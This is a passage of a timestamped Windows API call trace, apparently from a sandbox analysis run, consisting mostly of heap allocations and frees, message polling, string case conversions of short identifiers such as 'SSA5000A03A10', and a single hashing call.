(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.361] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.361] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.362] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.362] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.362] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.362] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.362] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.363] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.363] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.363] CryptHashData (hHash=0xaa58a0, pbData=0x24b18c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0200.368] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0200.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0200.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.369] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.369] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.369] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.370] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.370] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.370] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.371] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.371] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.371] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.372] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.372] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.373] HeapFree (in: hHeap=0x25c0000, 